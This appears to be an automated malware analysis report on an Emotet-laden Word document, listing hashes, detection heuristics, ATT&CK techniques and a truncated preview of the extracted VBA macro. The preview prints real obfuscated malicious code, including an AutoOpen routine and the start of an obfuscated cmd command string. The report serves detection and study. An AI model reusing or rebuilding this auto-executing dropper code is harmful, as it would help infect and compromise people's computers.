Emotet Office (OLE) malware analysis — malicious · 5211095e6fe4a852

MALICIOUS

Office (OLE)

139.6 KB Created: 2018-09-26 21:49:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: c8442dbf4b72a7835d97e322b1a6d360 SHA-1: 94a4edccc59b240b815a7ef523e68aceafce4f17 SHA-256: 5211095e6fe4a852b3bddacce0d63b7c5da2ecc2f0202632dc0006c22fec438b

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. This is further supported by the ClamAV detection identifying it as 'Doc.Downloader.Emotet-6884001-2'. The AutoOpen macro is present and configured to execute, strongly suggesting the VBA code is designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6884001-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6884001-2
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 111152 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	111152 bytes
SHA-256: `db85fcad310926271bb0c2e3e0c21726b03a083dafc2a2ee66ef6af09cad0b1f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "uplwidTTizusH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim QVWNBt(2) QVWNBt(0) = Left(GbzlziS + ATEZFzLVcnKcbhABii + aNUZAH, 759) + MidB(UFjmzXL + CfRhYcUKQiRGdNLlqwEiX + ZAqcJovH, 545, 150) QVWNBt(1) = Right(pshjwXVM + WlVMZPYztYiDrihWzBFzkWt + HKCwcz, 575) + MidB(zOfii + VGoqBQbqNaQpjGGqmr + FNZaJ, 594, 816) + Right(vqPPES + uaFOWNSXiZboXBjccoHwz + VvUac, 775) + MidB(sQVrjAGD + RpiYZWOVoDndFRTrhGklq + XJAbW, 724, 106) Dim twunij(2) twunij(0) = MidB(ktRofQ + suHlnzRNGthPFuSzkjncZQt + TdiDKOoF, 772, 791) + Right(hhKYnMCf + AnSuGFSitjbtzbBQpdzz + zcDmE, 830) + Right(UdrkPIjm + wNFoLwoAOIVAoOcPwRC + YVkFHth, 69) + Right(ArzKRGp + aizcDVYAWJCwVpMrjHj + VnXuwKIH, 32) twunij(1) = Mid(BZthkj + jPdEVbvuwiitdCwiEwOB + EUpwfHz, 285, 132) + MidB(rjBSAiO + dYYXlREodSNdUFfOrl + EUPfzMD, 278, 8) Dim VFSqE(2) VFSqE(0) = MidB(NBzUBC + REGolSkkjlIpFvaq + AYctm, 576, 849) + MidB(SJczTq + LBNViGTvNMuZbMrjdvwoP + Rbfnj, 980, 638) VFSqE(1) = MidB(pKoSRI + QfZzrkoCKuzNNXprPn + NXMWhW, 982, 274) + Right(lXkrLafu + omEAcMkcRiZkSMcDSDwaAb + MLOMUo, 58) Dim GfvSKN(1) GfvSKN(0) = MidB(adGUOPkK + zShJlDVmoslUvNlMn + VrtIw, 997, 37) + MidB(BILBa + tbOobhBpoASBwwzwpPcVD + bqcCQt, 908, 315) + Right(ZjanqEu + jOODBiDihRGLULMLXG + GOhAXIz, 223) + Right(DkHMm + NPkiaiMUhfriMcHpTijV + iuIjzt, 477) Dim SLuUmE(1) SLuUmE(0) = MidB(PMnRf + ErjasLEZzYjOENklJSjjfzK + OCvjcSH, 560, 170) + Left(POmHUOU + BcGXtZdYAahoTDrGwwkb + WujYOR, 593) + Left(jmwYmD + VICzavbQWObCRKXizA + vtQkXnf, 85) + Left(NPTBN + EBwvQMWRuOPYrjbFKLEj + KToBhz, 925) Dim KqmCjj(1) KqmCjj(0) = MidB(CbTUzZJY + wHthuMskEcXGvcDZ + FwqdurB, 664, 404) + Right(Sobdt + NpnzQLimOEwGzFJDDAjLJP + FAicCz, 131) + Right(nGiiwHi + YsLMKkUZwjiikKtilCzznV + aZFsCXf, 823) + MidB(sqtIM + iFJVXZUwBbasTztQUDiH + znjwpdpX, 789, 177) YcSnTRLM (KeyString(VzVwM + BuFnPZPI + 18 + 20 + 29 + UqjDr + wEVNRR) + XKzuBDU + jwZNHkk + KeyString(kkJCEiDw + lkkcX + 20 + 23 + 34 + PSOhwzru + ULrUluij) + WJJNWfv + aXhScVhQ + EDQIDw + joLVkP + FSXmYsGMaNu + RssYdXZ + jAVCYtkwsU + DofYGV + UiAWtP) Dim HAwKb(2) HAwKb(0) = MidB(sXGYlDDO + kqcoiYlddFfavOtJRWncrn + wSMQTYjJ, 480, 381) + Mid(bMPzwrM + KrmWFQwNlBocRMlG + pazEhFG, 808, 616) + MidB(DnmaZuO + MLiQzCnjkGGGRnRXEJ + lbZlCCr, 355, 448) + MidB(ZdriFf + JwsUzOImcqJJwpZQVko + NiAsZEL, 860, 441) HAwKb(1) = MidB(ltHcXltF + iOSwutjMiViJGZihRzm + tDhwt, 689, 832) + Mid(CiUhtiK + KHbGjAOMKYYjIFrLjUcr + Hctjf, 78, 434) + MidB(cLimUh + XjKDSiaonzvJhEbYVdjGB + TiZSWi, 39, 707) + MidB(cwptT + QXpJvwuiIMGqaIQCzVQVtYbF + miBWo, 804, 585) Dim Ymfjd(1) Ymfjd(0) = Mid(dOkThmfc + ACwkTqcGiKkCkvpETlm + uNVsX, 991, 984) + MidB(SpcBVF + GWritMzpqpYnkNqFVoFHil + uCSakIV, 590, 306) End Sub Attribute VB_Name = "BBVDJJJBaic" Function WJJNWfv() Dim LPKJVM(1) LPKJVM(0) = MidB(kzcSQ + jscXiIfDVUhYBKswAFJE + LnRSFJoR, 968, 403) + Mid(iEWfMC + fZziQaSVuanXVNkDMf + jvKfncV, 854, 141) Dim Vncjw(2) Vncjw(0) = Left(AUCFW + CNfAujKMHdShnqF + iznMuWv, 779) + MidB(TwnInQ + TPKmEJGFmThMAjCZTGYEr + nfXAiQoY, 724, 513) + Left(vdXnQIUb + RUikrjvKSkFiFIDs + GwiHwv, 351) + MidB(WbwUODRt + NqQBLHNFKARiOVDduk + OvIIBvfn, 277, 577) Vncjw(1) = MidB(YpwTRp + zwEtiRhOQiWCGChG + Wlnwoi, 405, 491) + Mid(FCjpR + ajszZwOFVnqRjjbKRwtmiI + YUoNk, 301, 739) + MidB(Zcznoi + hjScWsOHZTjzuubtRHDa + MrLiWdN, 208, 560) + MidB(MaBjvz + SbZPmCsMRBdJnAKulwFVUIR + ZJVHbk, 231, 16) Dim ZbiQYt(1) ZbiQYt(0) = Right(PZZrpO + tNGEGVVYfvtCYbAWIGjhc + BHuiUHs, 690) + Right(uiUDFFdt + VqwZVWGkNfdMNdFKoB + cFnzECB, 56) UEkUjrbvz = "d \\\/ \/\ \ \\" + "\ /V:O/C" + """" + "set {$\=a70" + "2 70a2 a720 27a" + "0 072a 02a7 027a 27" + "0a a270 02a7 07a" + "2 a702 a072 " Dim mnnCn(1) mnnCn(0) = Left(vEuWEz + RcwaUzSiFmnBSVMS + ahPdJUV, 733) + Mid(jFcDQ + mwmVEzBvvCbBshwujzLtijK + hNwlK, 598, 492) + MidB(MWkOhcZT + NzIIMVsbFHpuOTwQRWSN + UKUQi, 3 ... (truncated)

SHA-256: db85fcad310926271bb0c2e3e0c21726b03a083dafc2a2ee66ef6af09cad0b1f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "uplwidTTizusH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim QVWNBt(2)
QVWNBt(0) = Left(GbzlziS + ATEZFzLVcnKcbhABii + aNUZAH, 759) + MidB(UFjmzXL + CfRhYcUKQiRGdNLlqwEiX + ZAqcJovH, 545, 150)
QVWNBt(1) = Right(pshjwXVM + WlVMZPYztYiDrihWzBFzkWt + HKCwcz, 575) + MidB(zOfii + VGoqBQbqNaQpjGGqmr + FNZaJ, 594, 816) + Right(vqPPES + uaFOWNSXiZboXBjccoHwz + VvUac, 775) + MidB(sQVrjAGD + RpiYZWOVoDndFRTrhGklq + XJAbW, 724, 106)
   Dim twunij(2)
twunij(0) = MidB(ktRofQ + suHlnzRNGthPFuSzkjncZQt + TdiDKOoF, 772, 791) + Right(hhKYnMCf + AnSuGFSitjbtzbBQpdzz + zcDmE, 830) + Right(UdrkPIjm + wNFoLwoAOIVAoOcPwRC + YVkFHth, 69) + Right(ArzKRGp + aizcDVYAWJCwVpMrjHj + VnXuwKIH, 32)
twunij(1) = Mid(BZthkj + jPdEVbvuwiitdCwiEwOB + EUpwfHz, 285, 132) + MidB(rjBSAiO + dYYXlREodSNdUFfOrl + EUPfzMD, 278, 8)
   Dim VFSqE(2)
VFSqE(0) = MidB(NBzUBC + REGolSkkjlIpFvaq + AYctm, 576, 849) + MidB(SJczTq + LBNViGTvNMuZbMrjdvwoP + Rbfnj, 980, 638)
VFSqE(1) = MidB(pKoSRI + QfZzrkoCKuzNNXprPn + NXMWhW, 982, 274) + Right(lXkrLafu + omEAcMkcRiZkSMcDSDwaAb + MLOMUo, 58)
   Dim GfvSKN(1)
GfvSKN(0) = MidB(adGUOPkK + zShJlDVmoslUvNlMn + VrtIw, 997, 37) + MidB(BILBa + tbOobhBpoASBwwzwpPcVD + bqcCQt, 908, 315) + Right(ZjanqEu + jOODBiDihRGLULMLXG + GOhAXIz, 223) + Right(DkHMm + NPkiaiMUhfriMcHpTijV + iuIjzt, 477)
   Dim SLuUmE(1)
SLuUmE(0) = MidB(PMnRf + ErjasLEZzYjOENklJSjjfzK + OCvjcSH, 560, 170) + Left(POmHUOU + BcGXtZdYAahoTDrGwwkb + WujYOR, 593) + Left(jmwYmD + VICzavbQWObCRKXizA + vtQkXnf, 85) + Left(NPTBN + EBwvQMWRuOPYrjbFKLEj + KToBhz, 925)
   Dim KqmCjj(1)
KqmCjj(0) = MidB(CbTUzZJY + wHthuMskEcXGvcDZ + FwqdurB, 664, 404) + Right(Sobdt + NpnzQLimOEwGzFJDDAjLJP + FAicCz, 131) + Right(nGiiwHi + YsLMKkUZwjiikKtilCzznV + aZFsCXf, 823) + MidB(sqtIM + iFJVXZUwBbasTztQUDiH + znjwpdpX, 789, 177)
YcSnTRLM (KeyString(VzVwM + BuFnPZPI + 18 + 20 + 29 + UqjDr + wEVNRR) + XKzuBDU + jwZNHkk + KeyString(kkJCEiDw + lkkcX + 20 + 23 + 34 + PSOhwzru + ULrUluij) + WJJNWfv + aXhScVhQ + EDQIDw + joLVkP + FSXmYsGMaNu + RssYdXZ + jAVCYtkwsU + DofYGV + UiAWtP)
   Dim HAwKb(2)
HAwKb(0) = MidB(sXGYlDDO + kqcoiYlddFfavOtJRWncrn + wSMQTYjJ, 480, 381) + Mid(bMPzwrM + KrmWFQwNlBocRMlG + pazEhFG, 808, 616) + MidB(DnmaZuO + MLiQzCnjkGGGRnRXEJ + lbZlCCr, 355, 448) + MidB(ZdriFf + JwsUzOImcqJJwpZQVko + NiAsZEL, 860, 441)
HAwKb(1) = MidB(ltHcXltF + iOSwutjMiViJGZihRzm + tDhwt, 689, 832) + Mid(CiUhtiK + KHbGjAOMKYYjIFrLjUcr + Hctjf, 78, 434) + MidB(cLimUh + XjKDSiaonzvJhEbYVdjGB + TiZSWi, 39, 707) + MidB(cwptT + QXpJvwuiIMGqaIQCzVQVtYbF + miBWo, 804, 585)
   Dim Ymfjd(1)
Ymfjd(0) = Mid(dOkThmfc + ACwkTqcGiKkCkvpETlm + uNVsX, 991, 984) + MidB(SpcBVF + GWritMzpqpYnkNqFVoFHil + uCSakIV, 590, 306)
End Sub


Attribute VB_Name = "BBVDJJJBaic"
Function WJJNWfv()
Dim LPKJVM(1)
LPKJVM(0) = MidB(kzcSQ + jscXiIfDVUhYBKswAFJE + LnRSFJoR, 968, 403) + Mid(iEWfMC + fZziQaSVuanXVNkDMf + jvKfncV, 854, 141)
   Dim Vncjw(2)
Vncjw(0) = Left(AUCFW + CNfAujKMHdShnqF + iznMuWv, 779) + MidB(TwnInQ + TPKmEJGFmThMAjCZTGYEr + nfXAiQoY, 724, 513) + Left(vdXnQIUb + RUikrjvKSkFiFIDs + GwiHwv, 351) + MidB(WbwUODRt + NqQBLHNFKARiOVDduk + OvIIBvfn, 277, 577)
Vncjw(1) = MidB(YpwTRp + zwEtiRhOQiWCGChG + Wlnwoi, 405, 491) + Mid(FCjpR + ajszZwOFVnqRjjbKRwtmiI + YUoNk, 301, 739) + MidB(Zcznoi + hjScWsOHZTjzuubtRHDa + MrLiWdN, 208, 560) + MidB(MaBjvz + SbZPmCsMRBdJnAKulwFVUIR + ZJVHbk, 231, 16)
   Dim ZbiQYt(1)
ZbiQYt(0) = Right(PZZrpO + tNGEGVVYfvtCYbAWIGjhc + BHuiUHs, 690) + Right(uiUDFFdt + VqwZVWGkNfdMNdFKoB + cFnzECB, 56)
UEkUjrbvz = "d \\\/ \/\   \  \\" + "\ /V:O/C" + """" + "set {$\=a70" + "2 70a2 a720 27a" + "0 072a 02a7 027a 27" + "0a a270 02a7 07a" + "2 a702 a072 "
Dim mnnCn(1)
mnnCn(0) = Left(vEuWEz + RcwaUzSiFmnBSVMS + ahPdJUV, 733) + Mid(jFcDQ + mwmVEzBvvCbBshwujzLtijK + hNwlK, 598, 492) + MidB(MWkOhcZT + NzIIMVsbFHpuOTwQRWSN + UKUQi, 3
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.